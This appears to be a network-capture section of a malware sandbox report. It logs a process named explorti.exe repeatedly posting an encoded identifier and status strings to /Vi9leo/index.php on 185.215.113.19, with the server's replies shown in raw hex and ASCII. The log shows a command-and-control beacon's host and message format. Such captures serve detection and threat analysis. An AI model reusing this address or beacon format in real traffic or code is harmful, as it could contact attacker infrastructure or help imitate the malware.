Jul 27, 2024 06:34:24.939606905 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:25.187201977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	62250	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:25.297555923 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:26.072818041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:26.075995922 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:26.329232931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	62251	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:26.438512087 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:27.219583035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:27.220460892 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:27.467883110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	62252	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:27.611017942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:28.372215033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:28.372869968 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:28.621743917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	62253	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:28.742228031 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:29.502266884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:29.503108978 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:29.752032995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	62254	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:29.863081932 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:30.615076065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:30.616013050 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:30.862770081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	62255	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:30.985665083 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:31.732043028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:31.732847929 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:31.979434967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	62256	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:32.094496012 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:32.842763901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:32.843457937 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:33.089169025 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	62257	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:33.203443050 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:33.967447996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:33.968056917 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:34.457376957 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 27, 2024 06:34:34.457528114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	62258	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:34.578653097 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:35.337212086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:35.338403940 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:35.602006912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	62259	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:35.726834059 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:36.497459888 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:36.498120070 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:36.749432087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	62260	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:36.860146046 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:37.658412933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:37.659899950 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:37.911602974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	62261	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:38.034096956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:38.801388979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:38.804020882 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:39.052259922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

